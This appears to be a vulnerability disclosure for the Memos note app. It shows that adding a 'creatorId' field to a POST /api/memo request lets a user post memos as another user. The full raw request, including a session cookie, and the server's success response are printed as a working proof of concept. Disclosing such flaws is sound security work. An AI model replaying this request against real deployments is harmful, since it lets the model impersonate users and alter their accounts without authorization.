An attacker can be post malicious content to other user’s memos page via POST request, attacker just add an creatorID
into body request and send it with Burpsuite
Here is video poc: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link
POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}
HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}